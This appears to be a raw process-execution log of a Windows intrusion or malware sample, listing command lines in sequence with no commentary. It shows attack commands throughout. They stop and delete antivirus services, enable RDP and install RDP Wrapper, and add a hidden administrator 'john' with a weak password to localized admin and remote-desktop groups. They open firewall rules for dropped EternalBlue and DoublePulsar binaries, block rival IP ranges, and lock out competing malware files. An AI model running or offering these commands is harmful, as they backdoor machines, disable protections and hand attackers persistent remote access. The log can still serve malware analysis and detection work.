C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete "windows node"

C:\Windows\SysWOW64\sc.exe

sc delete "windows node"

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer

C:\Windows\SysWOW64\sc.exe

sc stop Adobeflashplayer

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MoonTitle

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\SysWOW64\sc.exe

sc stop MoonTitle

C:\Windows\SysWOW64\sc.exe

sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MoonTitle"

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

C:\Windows\SysWOW64\sc.exe

sc delete MoonTitle"

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\sc.exe

sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\sc.exe

sc delete clr_optimization_v4.0.30318_64"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SysWOW64\sc.exe

sc stop MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete MicrosoftMysql

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.22

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.186

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.186

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.169

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.169

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.11

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.11

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.236

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.236

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.61

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.61

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.102

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.102

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.151

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.151

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.26

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.26

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.230

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.230

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

